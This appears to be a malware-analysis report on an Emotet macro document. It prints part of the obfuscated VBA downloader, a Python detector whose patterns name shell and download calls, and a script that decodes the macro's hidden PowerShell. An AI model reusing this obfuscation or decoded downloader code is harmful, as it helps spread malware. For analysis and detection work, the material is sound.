Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 3a80d1a1862427a8…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 213.0 KB
Created: 2018-06-27 16:38:00
Authoring application: Microsoft Office Word
First seen: 2018-07-23
MD5: cfb79e6d031033b5899f39aae5ffff03
SHA-1: 90d26707497e7b51684dab876c71685aeca07077
SHA-256: 3a80d1a1862427a86153b3df5f0911bf1bb8ed92e2e352fef7afcc7e5c755dfe
Risk score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059 Command and Scripting Interpreter
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

ClamAV identifies the sample with an Emotet-specific signature (Doc.Downloader.Emotet-6877380-0). Static analysis recovers a VBA project containing an AutoOpen procedure, the execution vector Emotet documents rely on: the macro runs as soon as the document is opened with macros enabled, so the only user action required is the one tracked as T1204.002. The macro calls Shell(), handing a command line to the operating system; for Emotet that command line is a PowerShell downloader that fetches and runs the second-stage executable. The extracted source shows how that command line is hidden. It is assembled from dozens of short string literals joined with "+", and the readable prefix "[StrING]::JOin('', ( ( 1 ,83 , 106 ,95 ..." is followed by a long list of small integers, which is the shape of a PowerShell [String]::Join over a character array; the step that turns each integer into a character lies outside the visible portion of the macro. The remaining statements (CDate(), Sin() and numeric assignments to throw-away variables, and assignments from variables that are never set, such as QijGa = bIilL, which merely copy Empty) do nothing useful: they pad the code and break byte-level signatures, and On Error Resume Next guarantees none of them can interrupt execution.

Heuristics (7)

  • ClamAV: Doc.Downloader.Emotet-6877380-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877380-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The macro calls Shell(), i.e. it launches an external command line from the document.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    An AutoOpen procedure runs automatically when the document is opened with macros enabled, without any further user interaction.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this description conflicts with the extracted artifact below (a modern VBA project was recovered as macros.bas); for this sample the marker is at most corroborating evidence and adds nothing to the AutoOpen finding above.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace URI that Office writes into any document containing drawing objects; it is not a network indicator and must not be added to blocklists.
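The OLE_VBA_AUTOOPEN, OLE_VBA_SHELL and obfuscation observations above are the kind of checks an analyst can reproduce over extracted macro source. The following is an added example, not the analysis platform's own rule engine: it scans VBA text for auto-exec procedure names, external-execution tokens, error suppression and string-literal concatenation density, and scores the combination. The two OLE_VBA_* rule ids reuse the page's names; the X_* ids, the thresholds and both sample macros are this example's own. The suspicious sample is constructed (the preview above is cut off before the AutoOpen and Shell lines), reusing one concatenation line verbatim from the extracted macro.

```python
import re

# Constructed sample for this example (not from the page): a minimal AutoOpen procedure
# in the style of the extracted macro, with one concatenation line copied from it.
SAMPLE_VBA = r'''Attribute VB_Name = "tECJutjzj"
Sub AutoOpen()
On Error Resume Next
NzQCti = CDate(60569)
QijGa = bIilL
izSGfTzmK = "Hell [S" + "trING]:" + ":J" + "Oi" + "n" + Chr(40) + "'', " + Chr(40) + " " + Chr(40) + " 1 " + ",83 , " + "106 ,95 "
cmd = "powerS" + izSGfTzmK
Shell cmd, 0
End Sub
'''

# Constructed benign macro used as a control.
CLEAN_VBA = r'''Sub FormatReport()
Dim total As Double
total = Application.WorksheetFunction.Sum(Range("A1:A10"))
MsgBox "Total: " & total
End Sub
'''

# Procedure names that Word/Excel run without user interaction.
AUTOEXEC_NAMES = {
    "autoopen", "auto_open", "document_open", "autoexec", "autoexit",
    "autoclose", "auto_close", "document_close", "workbook_open", "workbook_close",
}
PROC_RE = re.compile(r"^\s*(?:public\s+|private\s+)?(?:sub|function)\s+(\w+)", re.I)

# Tokens that hand control to something outside the VBA runtime. OLE_VBA_SHELL mirrors the
# heuristic listed above; X_OBJECT_EXEC is this example's own rule id.
EXEC_RULES = {
    "OLE_VBA_SHELL": re.compile(r"\bShell\s*[\( ]", re.I),
    "X_OBJECT_EXEC": re.compile(
        r"CreateObject\s*\(|WScript\.Shell|URLDownloadToFile|\.Exec\s*\(|\.Run\s*\(", re.I),
}
STRING_LITERAL_RE = re.compile(r'"(?:[^"]|"")*"')
CONCAT_THRESHOLD = 6  # literals per line before the line counts as obfuscated assembly


def scan_vba(src):
    """Return a list of findings, one dict per matched rule and line."""
    findings = []
    for no, line in enumerate(src.splitlines(), 1):
        m = PROC_RE.match(line)
        if m and m.group(1).lower() in AUTOEXEC_NAMES:
            findings.append({"rule": "OLE_VBA_AUTOOPEN", "line": no, "detail": m.group(1)})
        for rule, rx in EXEC_RULES.items():
            if rx.search(line):
                findings.append({"rule": rule, "line": no, "detail": line.strip()[:60]})
        if re.match(r"\s*On\s+Error\s+Resume\s+Next", line, re.I):
            findings.append({"rule": "X_ERROR_SUPPRESSION", "line": no, "detail": line.strip()})
        literals = STRING_LITERAL_RE.findall(line)
        if len(literals) >= CONCAT_THRESHOLD and re.search(r'"\s*[+&]\s*', line):
            findings.append({"rule": "X_CONCAT_DENSITY", "line": no,
                             "detail": f"{len(literals)} literals joined on one line"})
    return findings


def verdict(findings):
    """Auto-exec plus an execution token is the combination that matters; either alone
    is only a lead, and padding/error-suppression findings never raise the level."""
    rules = {f["rule"] for f in findings}
    autoexec = "OLE_VBA_AUTOOPEN" in rules
    execs = bool(rules & set(EXEC_RULES))
    if autoexec and execs:
        return "high"
    if autoexec or execs:
        return "medium"
    return "low" if rules else "none"


if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("clean", CLEAN_VBA)):
        fs = scan_vba(src)
        print(f"{name}: verdict={verdict(fs)}")
        for f in fs:
            print(f"  line {f['line']:>3} {f['rule']:<22} {f['detail']}")
```

The concatenation-density rule is what separates this sample's style from ordinary business macros: a legitimate macro rarely joins more than a handful of literals on one line, while the extracted source does it on every payload line. Treat the threshold as a starting point and tune it against your own clean corpus before using the rule for alerting.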

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10537 bytes
SHA-256: 886da7781eb4a8eee12d80fbb0a3bcf49096fde0b42f8e1c74e47e62cdbebe9c

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "hzrNfVlI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tECJutjzj"
Function CsSjJwEzUqm()
On Error Resume Next
NzQCti = CDate(60569)
NZaKsp = 85589
LtHupX = 87757
dMvpa = Sin(89840)
Azscc = 22032
QijGa = bIilL
izSGfTzmK = "Hell [S" + "trING]:" + ":J" + "Oi" + "n" + Chr(40) + "'', " + Chr(40) + " " + Chr(40) + " 1 " + ",83 , " + "106 ,95 "
hOCXd = CDate(48832)
MaRvhH = 36756
HNwQo = 28012
wYErdi = Sin(56369)
viwkID = 68444
iRitj = pTrRiF
wrmKGoEdhuk = ",2" + "4 ,75 ," + "64,82 ,8" + ",74,71" + ", " + "79, " + "64 "
SMWQl = CDate(97538)
tALQn = 78919
LdhWYR = 23933
RAkuf = Sin(68418)
tiNUNF = 72382
liGSr = zwmWX
rsjMVUjIC = ",70 " + ", 81," + " 5, 10" + "7 ,64" + ",81, " + "11, " + "114,"
bbzZAh = CDate(86911)
LBwwUm = 36583
QQBGir = 64123
kKJIzY = Sin(2904)
jwBbs = 22038
MJSfJ = lTqiC
MbDFHWdEFHh = "64 ,71, " + "102,73" + ",76," + "64," + "75 , 81" + " ,30," + "1,82, 6" + "5 , 65 ,"
pjCmYP = CDate(56169)
AslddH = 34248
lisDSO = 48816
luPLV = Sin(70985)
jWFhi = 20847
SNVPO = wsqlB
PKBjOFaubGD = " 24 ," + "2, " + "77,81 ," + "81 , 8" + "5 , 31 ," + " 10," + " 10, 8" + "2,82," + " 82 ," + " 11 ,86"
LZIzKf = CDate(53284)
smKWlC = 30196
jOjkA = 29455
XRwJjq = Sin(7860)
bafYkj = 42222
LZHnZW = jsHwAM
IqpVFH = ", 77," + "74 " + ", 85 ,8" + "1 , 77" + ",64, " + "85,74 ," + " 72" + ",6" + "4 ,66, 8" + "7 ," + "68" + " ,7"
CCIjE = CDate(18308)
XWTNK = 92854
QIInB = 23148
cubwL = Sin(3653)
EDOlWz = 23856
iGjhU = CkfUuj
bmOkbikK = "5,68, 81" + " ,64,11" + " , 70,7" + "4 , 7" + "2 ,10,1" + "24, 8" + "1 , 29 " + ",19 ,1" + "0 ,101 "
MzCRpo = CDate(47423)
nsCXuq = 6524
dfQvwJ = 24685
OmtiX = Sin(20468)
swXdrB = 23296
WRDzDK = MUKjvI
FZGTBzYR = ", 7" + "7," + " 81" + " ,81" + ", 85 ,3" + "1 ,10, 1"
vUiAdj = CDate(63833)
LfpkW = 75836
NfrnR = 45810
UprCC = Sin(72313)
wuCaN = 64371
SLhui = wjQuJ
KhRvP = "0,82 " + ", 82," + " 82,11 ," + " 86,77 " + ", 68 , 7" + "5 ," + "66,77 " + ", 68,76," + " 7" + "6 ,70" + " , 7" + "7,"
mYwZhI = CDate(84726)
TZkAY = 93109
RmWjm = 54746
DNpBm = Sin(83110)
oNrXJ = 1443
LFiGLM = cbLGPq
YRlkazAU = " 76,71" + " ," + "68, 75" + " ,11," + "70,74 " + ", 72, 1" + "0 ," + " 106"
CsSjJwEzUqm = izSGfTzmK + wrmKGoEdhuk + rsjMVUjIC + MbDFHWdEFHh + PKBjOFaubGD + IqpVFH + bmOkbikK + FZGTBzYR + KhRvP + YRlkazAU
ihXKnl = CDate(12791)
ovzbs = 64717
oWRqH = 54667
kOjio = Sin(72866)
NVFdz = 58250
fIdbD = ftFmPY
End Function
Function PqvAQMGjjWU()
On Error Resume Next
LLuwXW = CDate(52414)
SLsvJE = 20813
rnRjTt = 36858
JOTRw = Sin(91198)
VEamuf = 77344
ordZk = KBjWfu
dZcjSjPS = ",83, 93," + "119, 67" + " , 10" + " ,101," + " 77" + " ,81,81" + " , 85 , " + "31,10,10" + ",83" + ", "
PZKahU = CDate(36508)
zhRLru = 74820
FLAVi = 82551
JicSMp = Sin(11303)
MdjaO = 29879
YNiiVf = iafzra
KTojWA = "74,76," + "70," + " 64 , 9" + "2 , 74 " + ",80 ,8" + "7,74, " + "85" + ",76 ," + " 7" + "5 " + ",76" + ",74, 75"
rQZYtv = CDate(48639)
UbVZjN = ilztR
XZNRGq = 32012
qlsBpo = Sin(15518)
DotfO = 87822
iBJti = 38172
IBCtV = " ,86,11" + ",75 , 64" + " , 81" + " ,10" + " ," + "96 , 7" + "1, " + "68 , 1" + "07, 1" + "7,10"
rEPXHE = CDate(6993)
sDuQmc = RUpnAE
cIPhVA = 62386
tcCtFJ = Sin(73285)
XEiLF = 55304
nCWAFn = 84468
vrUpGIGBU = " , " + "101 " + ",77 , 81" + ",81 , 8" + "5 ,31, 1" + "0, " + "10 ,8"
CziGDF = CDate(56116)
SrHaf = mbXQZa
lGzip = 28502
FmJCdI = Sin(9908)
dGdYM = 38404
ZYvaO = 71082
AYwXHBm = "2 ," + "82,8" + "2 , 11 " + ",85 ,73" + " , 68, 7" + "5,74,65" + ",6" + "4,74"
RivLZo = CDate(28965)
kzNuL = iNLtj
NOwSHB = 9375
qidZm = Sin(25464)
AjLSA = 28127
GiiqWS = 48731
TaJJUcWjLHU = ",71 , 8" + "7 ,6" + "8 ,86 ,6" + "5, 64" + " ," + " 76 , 7" + "3," + " 77" + " ," + "68" + ",71,6" + "4 "
PqvAQMGjjWU = dZcjSjPS + KTojWA + IBCtV + vrUpGIGBU + AYwXHBm + TaJJUcWjLHU
DZp
... (truncated)
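The ten string-building lines of CsSjJwEzUqm() are complete in the preview above, but the routine that turns the integer list into characters is in the truncated part of the macro. The following is an added example, not the analysis platform's code and not code from the sample: it replays the VBA "+" concatenation over the ten literal lines copied from the extract, separates the readable [StrING]::JOin prefix from the integer array, and then recovers a single-byte decoding key by trying XOR and additive offsets and scoring each output for the byte pattern "http://". The choice of scheme and key is therefore an inference from the data, an assumption that the macro's own (unseen) decoder should confirm, and the marker-based scoring is this example's own heuristic.

```python
import re

# Right-hand sides of the ten string assignments inside CsSjJwEzUqm(), copied from the
# extracted macro above in source order, one tuple per VBA line; Chr(40) is written as "(".
CSSJJWEZUQM_FRAGMENTS = [
    ("Hell [S", "trING]:", ":J", "Oi", "n", "(", "'', ", "(", " ", "(", " 1 ", ",83 , ", "106 ,95 "),
    (",2", "4 ,75 ,", "64,82 ,8", ",74,71", ", ", "79, ", "64 "),
    (",70 ", ", 81,", " 5, 10", "7 ,64", ",81, ", "11, ", "114,"),
    ("64 ,71, ", "102,73", ",76,", "64,", "75 , 81", " ,30,", "1,82, 6", "5 , 65 ,"),
    (" 24 ,", "2, ", "77,81 ,", "81 , 8", "5 , 31 ,", " 10,", " 10, 8", "2,82,", " 82 ,", " 11 ,86"),
    (", 77,", "74 ", ", 85 ,8", "1 , 77", ",64, ", "85,74 ,", " 72", ",6", "4 ,66, 8", "7 ,", "68", " ,7"),
    ("5,68, 81", " ,64,11", " , 70,7", "4 , 7", "2 ,10,1", "24, 8", "1 , 29 ", ",19 ,1", "0 ,101 "),
    (", 7", "7,", " 81", " ,81", ", 85 ,3", "1 ,10, 1"),
    ("0,82 ", ", 82,", " 82,11 ,", " 86,77 ", ", 68 , 7", "5 ,", "66,77 ", ", 68,76,", " 7", "6 ,70", " , 7", "7,"),
    (" 76,71", " ,", "68, 75", " ,11,", "70,74 ", ", 72, 1", "0 ,", " 106"),
]


def vba_concat(fragment_lines):
    """Replay the macro's `+` concatenation: each line builds one string and the
    function's final line concatenates those strings in order."""
    return "".join("".join(parts) for parts in fragment_lines)


def split_command(text):
    """Separate the literal PowerShell prefix from the integer array that follows it.
    Integers that straddle two VBA literals (e.g. "7" + "5") are whole after concat."""
    first_digit = re.search(r"\d", text)
    prefix = text[:first_digit.start()]
    values = [int(v) for v in re.findall(r"\d+", text[first_digit.start():])]
    return prefix, values


def _candidates(values):
    # Two single-byte schemes are tried, XOR and additive offset (mod 256). Which one the
    # real macro applies is not visible on the page; this is an inference, not a reading.
    for key in range(256):
        yield "xor", key, bytes(v ^ key for v in values)
        yield "add", key, bytes((v + key) % 256 for v in values)


def recover_key(values, marker=b"http://"):
    """Pick the scheme/key whose output contains the marker most often, breaking ties on
    the share of printable ASCII. A URL list is the expected content of a downloader."""
    def score(out):
        printable = sum(32 <= b < 127 for b in out) / len(out)
        return (out.count(marker), printable)
    scheme, key, out = max(_candidates(values), key=lambda c: score(c[2]))
    return scheme, key, out.decode("ascii", "replace")


def recover_powershell(fragment_lines):
    prefix, values = split_command(vba_concat(fragment_lines))
    scheme, key, text = recover_key(values)
    return prefix, scheme, key, text


if __name__ == "__main__":
    prefix, scheme, key, text = recover_powershell(CSSJJWEZUQM_FRAGMENTS)
    print(f"visible prefix : {prefix!r}")
    print(f"scheme/key     : {scheme} {key}")
    print(f"decoded        : {text}")
```

Under that assumption the array decodes with XOR key 37 to a PowerShell fragment that creates a Net.WebClient and begins an "@"-separated list of download URLs, the usual shape of the Emotet first stage; the literal "Hell" in the visible prefix is presumably the tail of the "powershell" token assembled elsewhere in the macro. The second function, PqvAQMGjjWU(), carries the continuation of the same array and can be fed through the same routine. Before any host recovered this way is treated as an indicator, locate the decoding statement in the full macro and confirm it matches, since a different variant may use a different key or scheme and the marker heuristic will then pick a wrong candidate.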